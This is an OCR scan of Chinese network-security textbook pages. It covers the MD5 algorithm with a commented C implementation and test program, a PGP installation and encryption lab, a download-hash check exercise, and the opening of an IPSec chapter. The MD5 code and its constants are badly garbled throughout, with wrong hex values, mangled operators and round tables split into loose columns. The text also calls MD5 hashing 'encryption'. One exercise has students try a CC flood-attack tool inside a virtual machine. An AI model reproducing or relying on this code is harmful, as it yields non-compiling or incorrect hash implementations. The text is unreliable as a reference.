HH (a, b. c, d. M[ 5]. 31, Oxfffa39425 ; 

HH (d, a, b. c, M[ 8]. 32, 0x8771f681); 
HH (c. d. a. b. M[11]. 33, 0x6d9d6122); 
HH (b, c. d. a. M[14]. 34. 0xfde5380c) ; 
HH (a, b. c. d. M[ 1]. 31. Oxa4beea44) ; 
HH (d. a. b, c. M[ 4]. 32, Ox4bdecfa9) ; 

HH (c, d. a. b. M[ 7]. 33. Oxf6bb4b60) ; 
HH (b, c. d. a. M[10]. 34. Oxbebfbc70) ; 
HH (a, b. c, d. M[13]. 31. 0x289b7ec6) ; 
HH (d. a. b. c. M[ 0]. 32, 0xeaal27fa) ; 

HH (c, d. a. b. M[ 3]. 33. 0xd4ef3085); 
HH (b. c. d. a. M[ 6]. 34, 0xe4881d05); 
HH (a. b. c. d. M[ 9]. 31. 0xd9d4d039); 
HH (d, a. b. c. M[12]. 32, 0xe6db99e5) ; 
HH (c. d. a. b. M[15]. 33. Oxlfa27cf8); 
HH (b. c. d. a. M[ 2]. 34, 0xc4ac5665) ; 


II (a. b, c, d. ML 0 
b, c, M[ 7 


H (d. a, 


» 41, 0xf4292244); 
» 42, 0x432aff97) ; 


II (c, d. a. b. M[14]. 43. 0xab94232a7); 
II (b, c. d. a. M[ 5]. 44. 0xfc93a039) ; 
II (a, b. c, d. M[12]. 41. 0x655b59c3) ; 


H (d. a. 


b.c. 


H (c, d. a. b. 
H (b. c. d, a. 
II (a. b. c. d. 
II (d. a, b. c. 
II (c, d, a, b. 
II (b, c, d, a, M[13], 44, 0x4e0811a1); 


M[ 3]. 42. 0x8fí0ccc92) ; 
M[10]. 43. Oxffeff47d) ; 
M[ 1]. 44. 0x85845dd1); 
M[ 8]. 41. 0x6fa87e4D ; 
M[15]. 42. Oxfe2ce6e0) ; 
M[ 6]. 43. 0xa30143145 ; 
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II (a, b. c. d. M[ 4]. 41, 0xf7537e82) ; 
II (d, a. b. c. M(11]. 42. 0xbd3aí235) ; 
II (c, d, a, b. M[ 2]. 43. 0x2ad7d2bb) ; 
II (b, c. d, a, M[ 9]. 44, Oxeb86d391); 


5. 输出 结果 


最 后 将 a、b、c 和 d 还 原 为 A,B,C,D. HK ABCD 组 合 起 来 ,就 构成 原 消息 的 摘要 。 
JH C 语言 实现 MD5 加 密 算法 , md5.h 代码 如 下 。 


/* md5.h */ 
# ifndef _MD5_H_ 
# define _MD5_H_ 
# define R_memset(x, y, z) memset(x, y, z) 
# define R_memcpy(x, y, z) memcpy(x, y, z) 
# define R_memcmp(x, y, z) memcmp(x, y, z) 
typedef unsigned long UINT4; 
typedef unsigned char * POINTER; 
/* MD5 context. */ 
typedef struct ( 
/* state (ABCD) */ 
/ * 四 个 32bits 数 , 用 于 存放 最 终 计算 得 到 的 消息 摘要 . 当 消 息 长 度 > 512bits 时 ,也 用 于 存放 每 个 
512bits 的 中 间 结 果 * / 
UINT4 state[4]; 
/ * number of bits, modulo 2^64 (lsb first) x / 
/ 存储 原始 信息 的 bits 数 长 度 ,不 包括 填充 的 bits, 最 长 为 2^64 bits, 因为 2^64 是 一 个 64 位 
数 的 最 大 值 * / 
UINT4 count[2]; 
/* input buffer * / 
/* 存放 输入 的 信息 的 缓冲 区 ,512bits* / 
unsigned char buffer[64]; 
} MD5 CTX; 
void MD5Init(MD5 CTX *); 
void MD5Update(MD5 CTX * , unsigned char * , unsigned int); 
void MD5Final(unsigned char [16], MD5 CTX * ); 
# endif /* MD H */ 


md5. cpp 代码 及 说 明 如 下 。 


/* md5.cpp  */ 

# include "stdafx. h" 

/ * Constants for MD5Transform routine. * / 
/ * MD5 转换 用 到 的 常量 ,算法 本 身 规定 的 * / 
# define S11 7 

# define S12 12 

# define S13 17 

# define S14 22 

# define S21 5 

# define S22 9 


# define S23 14 
# define S24 20 
# define S31 4 
# define S32 11 
# define S33 16 
# define S34 23 
# define S41 6 
# define S42 10 
# define S43 15 
# define S44 21 
static void MD5Transform(UINT4 [4], unsigned char [64]); 
static void Encode(unsigned char * , UINT4 * , unsigned int); 
static void Decode(UINT4 * , unsigned char * , unsigned int); 
/ * 用 于 bits 填充 的 缓冲 区 ,为 什么 要 64 个 字 节 呢 ? 因 为 当 欲 加 密 的 信息 的 bits 数 被 512 除 余数 为 
448 时 ,需要 填充 的 bits 数 的 最 大 值 为 52= 64* 8 x / 
static unsigned char PADDING[64] = ( 
0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 
}; 
/ * 接 下 来 的 这 几 个 宏 定 义 是 MD5 算法 规定 的 ,是 对 信息 进行 MD5 加 密 都 要 做 的 运算 。* / 
/* F, G, Hand I are basic MD5 functions. * / 
# define F(x, y, z) (((x) & (y)) | ((—x) & (z))) 
# define G(x, y, z) (((x) & (z)) | ((y) & (—2))) 
# define H(x, y, z) ((x) ^(y) ^(z)) 
# define I(x, y, z) ((y) ^((x) | (—2))) 
/* ROTATE LEFT rotates x left n bits. * / 
# define ROTATE LEFT(x, n) (((x) << (n)) | ((x) >> (32- (n)))) 
/* FF, GG, HH, and II transformations for rounds 1, 2, 3, and4. 
Rotation is separate from addition to prevent recomputation. * / 
# define FF(a, b, c, d, x, s, ac) ( V 
(a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); V 
(a) = ROTATE LEFT ((a), (s)); \ 
(a) += (b); V 
) 
# define GG(a, b, c, d, x, s, ac) (V 
(a) += G((b), (c), (d)) + (x) + (UINTA)(ac); V 
(a) = ROTATE LEFT ((a), (s)); \ 
(a) += (b); \ 
) 
# define HH(a, b, c, d, x, s, ac) ( V 
(a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); V 
(a) = ROTATE LEFT ((a), (s)); N 
(a) += (b); \ 
} 
#define II(a, b, c, d, x, s, ac) ( V 
(a) += I((b), (c), (d)) + (x) + (UINT4)(ac); N 
(a) = ROTATE LEFT ((a), (s)); Ñ 
(a) += (b); X 
) 
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/* MD5 initialization. Begins an MD5 operation, writing a new context. * / 
/ * 初始 化 MD5 的 结构 */ 
void MD5Init (MD5 CTX * context) 
t 

/* 将 当前 的 有 效 信息 的 长 度 设 成 0* / 

context -> count[0] = context ->count[1] = 0; 

/ * Load magic initialization constants. * / 

/* 初 始 化 链接 变量 * / 

context -> state[0] 0x67452301; 

context 一 > state[1] Oxefcdab89; 

context 一 > state[2] = Ox98badcfe; 

context -> state[3] = 0x10325476; 
) 
/ * MD5 block update operation. Continues an MD5 message - digest operation, processing another 
message block, and updating the context. * / 
/* 将 与 加 密 的 信息 传递 给 MD5 结构 ,可 以 多 次 调用 。 
context: 初始 化 过 了 的 MD5 结构 。 
input: 欲 加 密 的 信息 ,可 以 任意 长 。 
inputLen: 指定 input 的 长 度 * / 
void MD5Update(MD5_CTX * context, unsigned char * input,unsigned int inputLen) 
{ 
unsigned int i, index, partLen; 
/ * Compute number of bytes mod 64 * / 
/* 计算 已 有 信息 的 bits 长 度 的 字 节 数 的 模 64, 64bytes = 512bits。 用 于 判断 已 有 信息 加 上 当前 传 
过 来 的 信息 的 总 长 度 能 不 能 达到 512bits, 如 果 能 够 达到 则 对 凑 够 的 512bits 进行 一 次 处 理 * / 
index = (unsigned int)((context 一 > count[0] >> 3) & Ox3F); 
/ * Update number of bits * //* 更 新 已 有 信息 的 bits 长 度 * / 
if((context -> count[0] += ((UINT4) inputLen << 3)) < ((UINT4) inputLen << 3)) 

context 一 > count[1]**; 
context 一 > count[1] *- ((UINT4) inputLen >> 29); 
/ * 计算 已 有 的 字 节 数 长 度 还 差 多 少 字 节 可 以 凌 成 64 的 整 倍数 * / 
partLen = 64 - index; 
/ * Transform as many times as possible. */ 
/* 如 果 当 前 输入 的 字 节 数 大 于 已 有 字 节 数 长 度 补足 64 字 节 整 倍数 所 差 的 字 节 数 * / 
if(inputLen > = partLen) 

{ 

/* 用 当前 输入 的 内 容 把 context -> buffer 的 内 容 补足 512bits * / 

R mencpy((POINTER)&context — > buffer[index], (POINTER)input, partLen); 

/* 用 基本 函数 对 填充 满 的 512bits( 已 经 保存 到 context -> buffer H) 做 一 次 转换 ,转换 结果 保 
存 到 context -> state 中 * / 

MD5Transform(context — > state, context 一 > buffer); 
/ * 对 当前 输入 的 剩余 字 节 做 转换 (如 果 剩余 的 字 节 在 输入 的 input 缓冲 区 中 大 于 512bits), 转 换 结 
果 保 存 到 context -> state 中 * / 

for(i = partLen; i + 63 < inputLen; i += 64)/* E i+ 63 < inputLen H} i+ 64<= inputLen 
更 容易 理解 * / 

MD5Transform(context —> state, &input[i]); 
index - 0; 


/* Buffer remaining input * / 


/* 将 输入 缓冲 区 中 的 不 足 填充 满 512bits 的 剩余 内 容 填 充 到 context -> buffer 中 ,留待 以 后 再 作 

处 理 * / 

R memcpy((POINTER)&context — > buffer[index], (POINTER)&input[i], inputLen- i); 

) 

/* MD5 finalization. Ends an MD5 message - digest operation, writing the 
the message digest and zeroizing the context. * / 

/* 获取 加 密 的 最 终结 果 

digest: 保存 最 终 的 加 密 串 

context: 前 面 初始 化 并 填 人 了 信息 的 MD5 结构 * / 

void MD5Final (unsigned char digest[16],MD5 CTX * context) 

t 

unsigned char bits[8]; 

unsigned int index, padLen; 

/ * Save number of bits * / 

/* 将 要 被 转换 的 信息 (所 有 的 ) 的 bits 长 度 复 制 到 bits 中 * / 

Encode(bits, context -> count, 8); 

/ * Pad out to 56 nod 64. * / 

/* 计算 所 有 bits 长 度 的 字 节 数 的 模 64, 64bytes = 512bits* / 

index = (unsigned int)((context 一 > count[0] >> 3) & 0x3f); 

/* 计算 需要 填充 的 字 节 数 ,padLen 的 取 值 范围 在 1 一 64 之 间 * / 

padLen = (index < 56) ? (56 - index) : (120 - index); 

/* 这 一 次 函数 调用 绝对 不 会 再 导致 MD5Transforn 的 被 调用 , 因为 这 一 次 不 会 填 满 512bits* / 

MD5Update(context, PADDING, padLen); 

/* Append length (before padding) * / 

/* 补 上 原始 信息 的 bits KE (bits 长 度 固定 的 用 64bits 表示 ) * / 

MD5Update(context, bits, 8); 

/ * Store state in digest * / 

/* 将 最 终 的 结果 保存 到 digest 中 。* / 

Encode(digest, context -> state, 16); 

/ * Zeroize sensitive information. * / 

R memset((POINTER)context, 0, sizeof( * context)); 

) 

/ * MD5 basic transformation. Transforms state based on block. * / 

/* 

对 512bits 信息 ( 即 block 缓冲 区 ) 进 行 一 次 处 理 ,每 次 处 理 包括 四 轮 。 

state[4]: MD5 结构 中 的 state[4] 用 于 保存 对 512bits 信息 加 密 的 中 间 结 果 或 者 最 终结 果 ; 

block[64]: 欲 加 密 的 512bits 信息 

*/ 

static void MD5Transform (UINT4 state[4], unsigned char block[64]) 

{ 

UINT4 a = state[0], b = state[1], c = state[2], d = state[3], x[16]; 

Decode(x, block, 64); 

/* Round1 */ 


FF(a, b, c, d, x[ 0], S11, 0xd762a478); /* 1 */ 
FF(d, a, b, c, x[ 1], S12, 0xe8c7b756); /* 2 * / 
FF(c, d, a, b, x[ 2], S13, 0x242070db); /* 3 */ 
FF(b, c, d, a, x[ 3], S14, Oxcibdceee); / * 4 * / 
FF(a, b, c, d, x[ 4], S11, Oxf57cOfaf); /* 5 */ 
FF(d, a, b, c, x[ 5], S12, 0x4787c62a); /* 6 */ 
FF(c, d, a, b, x[ 6], S13, 0xa8304613); /* 7 */ 
FF(b, c, d, a, x[ 7], S14, 0xfd469501); /* 8 * / 


FF(a, b, 
FF(d, a, 
FF(c, d, 
FF(b, c, 
FF(a, b, 
FF(d, a, 
FF(c, d, 
FF(b, c, 


a, 
d, 


实践 


d, x[ 8], 
c, x[ 9], 
b, x[10], 
a, x[11], 
d, x[12], 
c, x[13], 
b, x[14], 
8, 3115]; 


/* Round2 */ 


GG(a, b, 
GG(d, a, 
GG(c, d, 
GG(b, c, 
GG(a, b, 
GG(d, a, 
GG(c, d, 
GG(b, c, 
GG(a, b, 
GG(d, a, 
GG(c, d, 
GG(b, c, 
GG(a, b, 
GG(d, a, 
GG(c, d, 
GG(b, c, 


c, 


d, x[ 1], 
c, x[ 6], 
b, x[11], 
a, x[ 0], 
d, x[ 5], 
c, x[10], 
b, x[15], 
a, x[ 4], 
d, x[ 9], 
c, x[14], 
b, x[ 3], 
a, x[ 8], 
d, x[13], 
c, x[ 2], 
b, x[ 7], 
a, x[12], 


/* Round3 */ 


HH(a, b, 
HH(d, a, 
HB(c, d, 
HB(b, c, 
HH(a, b, 
HH(d, a, 
HH(c, d, 
HH(b, c, 
HH(a, b, 
HH(d, a, 
HH(c, d, 
HH(b, c, 
HH(a, b, 
HH(d, a, 
HH(c, d, 
HH(b, c, 


c, 


d, x[ 5], 
c, x[ 8], 
b, x[11], 
a, x[14], 
d, x[ 1], 
c, x[ 4], 
b, x[ 7], 
a, x[10], 
d, x[13], 
c, x[ 0], 
b, x[ 3], 
a, x[ 6], 
d, x[ 9], 
c, x[12], 
b, x[15], 
a, x[ 2], 


/* Round 4 */ 


II(a, b, 
II(d, a, 
II(c, d, 
II(b, c, 
Il(a, b, 
II(d, a, 
II(c, d, 


d, x[ 0], 
c, x[ 7], 
b, x[14], 
a, x[ 5], 
d, x[12], 
c, x[ 3], 
b, x[10], 


su, 
812, 
813, 
S14, 
Si, 
812, 
513, 
S14, 


S21, 
s22, 
$23, 
S24, 
S21, 
822, 
823, 
S24, 
S21, 
822, 
S23, 
S24, 
S21, 
S22, 
S23, 
S24, 


S31, 
S32, 
S33, 
S34, 
S31, 
S32, 
S33, 
S34, 
S31, 
S32, 
S33, 
S34, 
S31, 
S32, 
S33, 
S34, 


S41, 
S42, 
S43, 


0x698098d8); /* 9 * / 

Ox8b44f7af); / * 10 */ 
Oxffff5bbl); /* 11 */ 
0x895cd7be); /* 12 */ 
0x65901122); /* 13 */ 
0xfd987193); / * 14 */ 
0xa679438e); / * 15 */ 
0x49b40821); / * 16 */ 


0xf61e2562); / * 17 */ 
0xc040b340); /* 18 * / 
0x265e5a51); /* 19 * / 
Oxe9b6c7aa); / * 20 */ 
Oxd62f105d); /* 21 */ 

0x2441453); / * 22 * / 
Oxd8ale681); /* 23 */ 
Oxe7d3fbc8); / * 24 * / 
Ox21elcde6); /* 25 * / 
0xc33707d6); / * 26 * / 
Oxf4d50d87); / * 27 */ 
0x455alded); /* 28 */ 
0xa9e3e905); / * 29 */ 
Oxfcefa3f8); /* 30 */ 
0x676£02d9); /* 31 */ 
Ox8d2a4c8a); /* 32 */ 


Oxfffa3942); /* 33 * / 
0x8771£681); / * 34 */ 
0x6d9d6122); /* 35 * / 
Oxfde5380c); /* 36 * / 
Oxa4beea44); / * 37 */ 
Ox4bdecfa9); / * 38 */ 
Oxf6bb4b60); /* 39 */ 
Oxbebfbc70); / * 40 */ 
0x289b7ec6); / * 41 */ 
0xeaal27fa); / * 42 */ 
Oxd4ef3085); / * 43 */ 

0x4881d05); / * 44 «/ 
Oxd9d4d039); / * 45 */ 
Oxe6db99e5); / * 46 */ 
Oxlfa27cf8); /* 47 */ 
Oxc4ac5665); /* 48 */ 


0xf4292244); / * 49 * / 
0x432aff97); / * 50 */ 
0xab9423a7); / * 51 */ 


S44, 0xfc93a039); / * 52 
S41, 0x655b59c3); /* 53 
S42, 0x8f0ccc92); / * 54 
S43, Oxffeff47d); /* 55 


x/ 
x/ 
*/ 
*/ 


II(b, c, d, a, x[ 1], S44, 0x85845ddl); /* 56 * / 

II(a, b, c, d, x[ 8], S41, Ox6fa87e4f); / * 57 */ 

II(d, a, b, c, x[15], S42, Oxfe2ce6e0); / * 58 */ 

II(c, d, a, b, x[ 6], S43, 0xa3014314); / * 59 */ 

II(b, c, d, a, x[13], S44, 0x4e0811a1); /* 60 */ 

II(ay b, c, d, x[ 4], S41, 0x£7537e82); / * 61 */ 

II(d, a, b, c, x[11], S42, 0xbd3af235); / * 62 */ 

II(c, d, a, b, x[ 2], S43, 0x2ad7d2bb); / * 63 * / 

Il(b, c, d, a, x[ 9], S44, 0xeb86d391); /* 64 */ 

state[0] += a; 

state[1] += b; 

state[2] += c; 

state[3] += d; 

/* Zeroize sensitive information. * / 

R memset((POINTER)x, 0, sizeof(x)); 

1 

/* Encodes input (UINT4) into output (unsigned char). Assumes len is 
a multiple of 4. */ 

/* 将 4 字 节 的 整数 复制 到 字符 形式 的 缓冲 区 中 。 

output: 用 于 输出 的 字符 缓冲 区 。 

input: 欲 转换 的 四 字 节 的 整数 形式 的 数组 。 

len: output 缓冲 区 的 长 度 , 要 求 是 4 的 整数 倍 

*/ 

static void Encode(unsigned char * output, UINT4 * input,unsigned int len) 

t 

unsigned int i, j; 

for(i = 0, j = 0; j< len; i++, j += 4) ( 
output[j] = (unsigned char)(input[i] & Oxff); 
output[j +1] = (unsigned char)((input[i] >> 8) & Oxff); 
output[j + 2] (unsigned char)((input[i] >> 16) & Oxff); 
output[j + 3] (unsigned char)((input[i] >> 24) & Oxff) ; 

) 

) 

/ * Decodes input (unsigned char) into output (UINT4). Assumes len is 
a multiple of 4. */ 

/ * 与 上 面 的 函数 正好 相反 ,这 一 个 把 字符 形式 的 缓冲 区 中 的 数据 复制 到 4 字 节 的 整数 中 ( 即 以 整数 

形式 保存 ) 。 

output: 保存 转换 出 的 整数 。 

input: 欲 转换 的 字符 缓冲 区 。 

len: 输入 的 字符 缓冲 区 的 长 度 , 要 求 是 4 的 整数 倍 

*/ 

static void Decode(UINT4 * output, unsigned char * input,unsigned int len) 

t 

unsigned int i, j; 

for(i = 0, j = 0; j< len; i++, j += 4) 
output[i] = ((UINT4)input[j]) | (((UINT4)input[j+1]) <<8) | 
(((UINT4) input[j+2]) << 16) | (((UINT4)input[j+3]) << 24); 


I 
md5test. cpp 代码 及 说 明 如 下 。 


实践 


//md5test. cpp : Defines the entry point for the console application. 
HU 

# include "stdafx. h" 

# include "string. h" 

int main(int argc, char * argv[]) 

I 


MD5 CTX nd5; 

MD5Init(&md5); // 初 始 化 用 于 MD5 加 密 的 结构 
unsigned char encrypt[200]; // 存 放 欲 加 密 的 信息 
unsigned char decrypt[17]; // 存 放 加 密 后 的 结果 

scanf(" * s", encrypt); // 输 入 加 密 的 字符 
MD5Update(&md5, encrypt, strlen( (char * )encrypt));  // 对 欲 加 密 的 字符 进行 加 密 
MD5Final (decrypt, &md5) ; // 获 得 最 终结 果 


printf(" 加 密 前 : % s\n 加 密 后 :",encrypt); 
for(int i=0;i<16;i++) 
printf (" % 2x ",decrypt[i]); 
printf("\n\n\n 加 密 结 束 !\n"); 
return 0; 


} 
3.3.7 PGP 技 术 


1. 概念 


PGP( Pretty Good Privacy) 加 密 技 术 是 一 个 基于 RSA 公 钥 加 密 体系 的 邮件 加 密 软 件 ， 
提出 了 公共 钥匙 或 不 对 称 文件 的 加 密 技术 。PGP 加 密 技术 的 创始 人 是 美国 的 Phil 
Zimmermann。 他 的 创造 性 把 RSA 公 钥 体系 和 传统 加 密 体系 结合 起 来 ,并 且 在 数字 签名 
和 密 钥 认证 管理 机 制 上 有 巧妙 的 设计 ,因此 PGP 成 为 目前 几乎 最 流行 的 公 钥 加 密 软 
件 包 。 

由 于 RSA 算法 计算 量 极 大 ,在 速度 上 不 适合 加 密 大 量 数据 ,所 以 PGP 实际 上 用 来 加 密 
的 不 是 RSA 本 身 , 而 是 采用 传统 加 密 算 法 IDEA. IDEA 加 解密 的 速度 比 RSA 快 得 多 。 
PGP 随机 生成 一 个 密 钥 ,用 IDEA 算法 对 明文 加 密 , 然 后 用 RSA 算法 对 密 钥 加 密 ; 收 件 人 
同样 是 用 RSA 解 出 随机 密 钥 ,再 用 IEDA 解 出 原文 。 这 样 的 链 式 加 密 既 有 RSA 算法 的 保 
密 性 (Privacy) 和 认证 性 (Authentication) ,又 保持 了 IDEA 算法 速度 快 的 优势 。 


2. PGP 加 密 软 件 
使 用 PGP8. 0. 2i 可 以 简洁 而 高 效 地 实现 邮件 或 者 文件 的 加 密 、 数 字 签 名 。 


网 络 软件 下 载 安全 性 检验 


【实验 目的 】 
(1) 理解 MD5 的 含义 。 
(2) 掌握 MD5 的 一 般 应 用 ,完成 网 络 下 载 安全 性 检查 。 


【实验 步骤 】 


(1) 以 下 载 国 泰 君 安 软件 为 例 ,打开 网 站 “http://www. gtja. com/jccy/softdownload. 
html”, 下 载 官方 提供 的 MD5 码 计算 工具 和 国泰 君 安 大 智慧 软件 。 

(2) 运行 MD5 码 计算 工具 GtjaMD5. exe. 

(3) 浏览 所 下 载 的 国泰 君 安 大 智慧 软件 ,选择 计算 等 待 生 成 MD5 码 , 如 图 3-10 所 示 。 


—— ss r — L 
浏览 .| 计算 | we | 


[© Baez: voee HERIR 


文件 大 小 | 加 5 校 验 码 | 
C:Wse... 9597.41 k f2bfde7eeaecT583245d7a0dacd8f2cd 


图 3-10 生成 MD5 码 


(4) 检查 生成 的 MD5 码 是 否 与 网 站 提供 下 载 的 MD5 码 相同 。 
【思考 与 练习 】 


网 络 上 可 以 很 容易 找到 MDS 的 破解 网 站 ,那么 它们 是 有 效 的 吗 ? 如 果 有 效 ,方法 是 什 
么 ?是 否 说 明 MD5 有 问题 呢 ? 


PGP 加 密 应 用 实验 


(1) 安装 PGP 加 密 软 件 。 
PGP 的 安装 向 导 界 面 如 图 3-11 所 示 。 


Welcome 


Welcome to the PGP E.02 instaler. We sticngy 
recommend that you exi all Windows programe belore 
continuing 


Thank you for using out products. 


e [i ce | 


图 3-11 安装 向 导 


实践 


下 面 的 几 步 全 采用 默认 的 安装 设置 ,因为 是 第 一 次 安装 ,所 以 在 用 户 类 型 设置 界面 中 选 
择 “No, I'm a New User” 单 选 按钮 ,如 图 3-12 所 示 。 


User Type 
Please tell us if you have existing PG? Keyrings you'd Ike to use. 


(— Doycualteady have PGP keyings you would Ike touse? 
C Yes, | already havekeyinge 


G Nai sNew Used 


Pgp.com 


Lue [me em | 


图 3-12 用户 类 型 选择 
根据 需要 选择 安装 的 组 件 一 般 根据 默认 选 即 设置 项 可 ,PGPdisk Volume Security 的 功 
能 是 提供 磁盘 文件 系统 的 安全 性 ; PGPmail for Microsoft Outlook/Outlook Express 提供 
邮件 的 加 密 功能 ,如 图 3-13 所 示 。 


PGP 8.0.2 


Select Components 
Choose the components Setup will install 


LAR PGPmai tor ICQ 
l| PGPrai for Microsoft Outlook 
ivi PGPmai lor Microsoft Outlook Express 
ED PGPmai for Qualcomm Eudora 

—@ PoPma for Groupwite 


Space Required on G: OK 
Space Available on G: 17078150K 
pgp com 
lack Cancel 
[ses fr nal ese T 


图 3-13 选择 功能 


(2) 使 用 PGP FERH. 
用 户 类 型 选择 了 新 用 户 ,在 计算 机 启动 以 后 ,会 自动 提示 建立 PGP 密 钥 , 如 图 3-14 


所 示 。 
单 击 “ 下 一 步 ? 按 钮 ,进入 用 户 信息 设置 界面 ,输入 相应 的 姓名 和 电子 邮件 地 址 ,然后 单 


击 * 下 一 步 ?按钮 ,如 图 3-15 所 示 。 
在 PGP 密码 输入 框 中 输入 8 位 以 上 的 密码 并 确认 ,如 图 3-16 所 示 。 


Welcome to the PGP Key 
Generation Wizard 


In cider for other people to send you secure messages, 
you mas frst gerracle a kay pai. 


Your key pai wil also be used to sign ctal documents. 
A key pair consists of a "Public Key." and a "Private 
Key." The public key should be given to everyone you 
know [PGP has facilities lo assist in this], The private key 
shouid be kept absolutely secret. 
|l you word like more information on what a key pair is 
and how PGP works, choose the PGPkeys Hep mena. 
herwise, choose Next to continue. Expert users can 
detailed control. 


raa idu 
m | 
PE S 取消 


图 3-14 提示 建立 PGP EH 


Name and Email Assignment 
Every key pair must have a name associated wihit The name and email address let 
your cottesponderis know that the public key they are using belongs to you. 


Full name: feder 
By associating an amal address vath, i you wil enable PGP to assist 
Esc Mee es 


Emal address: | 


< 取消 


图 3-15 设置 用 户 信息 


[rP xey Generation weard ME 


Passphrase Assignment 
"Your pri be [LI that this 
Eear a lee 


Your passphrase should be at least 8 characters long and shouid contain 
non-alphabebe characters. 


[V Hide Typing 


Bassphiase: | 


Fassphese Queity. Bm 000000000 
Confirmation: 


a m3] 取消 


图 3-16 设置 密码 信息 


实践 


然后 PGP 会 自动 产生 PGP 密 钥 ,生成 的 密 钥 如 图 3-17 BER. 
=ioixi 


Ele Edt Wew Keys Server Groups Help 


EAT ELE] 


+ 
[1 key(s) selected [ á 
图 3-17 生成 密 钥 
(3) 使 用 nal 加 密 文件 。 | mo 
使 用 PGP 可 以 加 密 本 地 文件 , 右 击 要 加 密 的 文 EN AD G 
件 , 在 弹出 的 快捷 菜单 中 选择 PGP—- Encrypt 命令 ,如 pm > 
图 3-18 所 示 。 EUGHNERNND o 
系统 自动 出 现 对 话 框 , 让 用 户 选 择 要 使 用 的 加 FE NE 
MM _ 
密 密 钥 ,选中 一 个 密 钥 后 单 击 OK 按钮 ,如 图 3-19 w 


所 示 。 
ËF PGPshell - Key Selection Dialog 


Drag users from this let to the Recipients let [ vaty | see | 


best,txt 


图 3-19 选择 密 钥 图 3-20 


此 时 目标 文件 被 加 密 了 ,当前 目录 下 自动 产生 一 个 新 的 文件 ,如 图 3-20 Bron -o 
打开 加密 后 的 文件 时 ,程序 会 要 求 输入 密码 ,并 要 求 输入 建立 该 密 钥 时 设置 的 密码 ,如 
图 3-21 所 示 。 


PGPmail - Enter Passphrase 了 xj 


Message was enciypted to the following public key(s) ` 
Ë Hacker@ton com? QN/2048) 


Enter passphrase for your piivate key - IV. Hide Typing 


图 3-21 设置 生效 


(4) 使 用 PGP 加 密 邮 件 。 
PGP 的 主要 功能 是 加 密 邮 件 , 安 装 完 毕 后 .PGP 会 自动 和 Outlook 或 者 Outlook 
Express 关联 。 和 Outlook Express 关联 的 界面 显示 如 图 3-22 所 示 。 


| ZD MED FEW TAD MHD WR 
FFE 

新 邮件 f 通讯 和 ER keys. 
=. Outlook Express 


电子 邮件 
BREE” 中 有 二 NEE 
设置 邮件 三 号 


没有 联系 人 
击 米 创 汗 一 个 新 的 联系 人 。 


可 里 示 。 在 联系 人 "上 单 | 联系 


图 3-22 关联 界面 
利用 Outlook 建立 邮件 后 ,可 以 选择 利用 PGP 进行 加 密 和 签名 ,如 图 3-23 所 示 。 


aloj x| 
| XE) REO ZEV MAD 格式 (0) IAW Mm FHH 


a > m a gla rl 


图 3-23 ”加密 邮件 


实践 


【思考 与 练习 】 

CD 找到 一 个 你 认为 好 用 的 DES 加 密 软 件 ,对 自己 指定 的 文件 进行 加 密 解 密 操作 , 提 
交 报告 ( 带 截 图 及 说 明 )。 并 请 设计 一 个 你 认为 对 自己 来 说 最 有 可 能 应 用 DES 的 情境 。 

(2) 请 解释 什么 是 APT。 并 找到 一 款 APT 工具 ,试用 它 验 证 有 效 性 。 

(3) 请 解释 什么 是 CC 攻击 。 尝 试 找到 一 款 CC 攻击 工具 ,试用 并 验证 它 的 有 效 性 。 

以 上 操作 要 确保 不 在 真实 网 络 中 使 用 以 免 带 来 危害 ,最 好 在 虚拟 机 环境 下 测试 完成 。 


y Wigs 


随 着 Internet 的 高 速 发 展 ,网 络 上 开发 的 应 用 越 来 越 多 ,一 些 关键 业 
务 也 开始 通过 Internet 提供 。 而 Internet 的 一 大 特性 是 它 的 开放 性 ,下 
是 这 种 开放 性 给 Internet 服务 的 安全 构成 了 严重 威胁 。 为 了 保证 它 能 够 
健康 有 序 地 发 展 ,必须 在 网 络 安全 上 提供 强 有 力 的 保证 。 


4.1 安全 传输 技术 简介 


利用 安全 通道 技术 (Secure Tunneling Technology) ,通过 将 待 传输 
的 原始 信息 进行 加 密 和 协议 封装 处 理 后 再 能 套装 入 另 一 种 协议 的 数据 
包 送 入 网 络 , 像 普通 数据 包 一 样 进行 传输 ,经 过 这 样 的 处 理 ,只 有 源 端 和 
目的 端的 用 户 能 够 对 通道 中 的 榜 套 信息 进行 解释 和 处 理 ,而 对 于 其 他 用 
户 而 言 只 是 无 意义 的 信息 。 网 络 安全 传输 通道 应 该 提供 以 下 功能 和 
特性 。 
。 机 密 性 : 通过 对 信息 加 密 保 证 只 有 预期 的 接收 者 才能 读 出 数据 。 
。 完整 性 : 保护 信息 在 传输 过 程 中 免 遭 未 经 授权 的 修改 ,从 而 保证 
接收 到 的 信息 与 发 送 的 信息 完全 相同 。 
。 对 数据 源 的 身份 验证 : 通过 保证 每 个 计算 机 的 真实 身份 来 检查 
信息 的 来 源 以 及 完整 性 。 
。 反 重 发 攻击 : 通过 保证 每 个 数据 包 的 唯一 性 来 确保 攻击 者 捕获 
的 数据 包 不 能 重 发 或 重用 。 
在 网 络 的 各 个 层次 均 可 实现 网 络 的 安全 传输 ,相应 地 ,安全 传输 通 
道 分 为 数据 链 路 层 安 全 传输 通道 (L2TP 与 PPTP) 网络 层 安 全 传输 通 
道 (IPSec)、 传 输 层 安全 传输 通道 (SSL)、 应 用 层 安 全 传输 通道 。 其 中 
IPSec 和 SSL 安全 传输 技术 是 最 为 常用 的 ,下 面 将 重点 予以 介绍 。 


4.2 IPSec 安全 传输 技术 


IPSec 是 一 种 建立 在 Internet 协议 (IP) 层 之 上 的 安全 传输 技术 , 它 
能 够 让 两 个 或 更 多 主机 以 安全 的 方式 通信 。IPsec 既 可 以 用 来 直接 加 密 
主机 之 间 的 网 络 通信 (也 就 是 传输 模式 ) ,也 可 以 用 来 在 两 个 子 网 之 间 建 
造 “ 虚 拟 隧道 ”用 于 两 个 网 络 之 间 的 安全 通信 (也 就 是 隧道 模式 ) 。 后 一 
种 即 虚拟 专用 网 (VPN)。 


实践 


4.2.1 IPSec VPN 的 工作 原理 


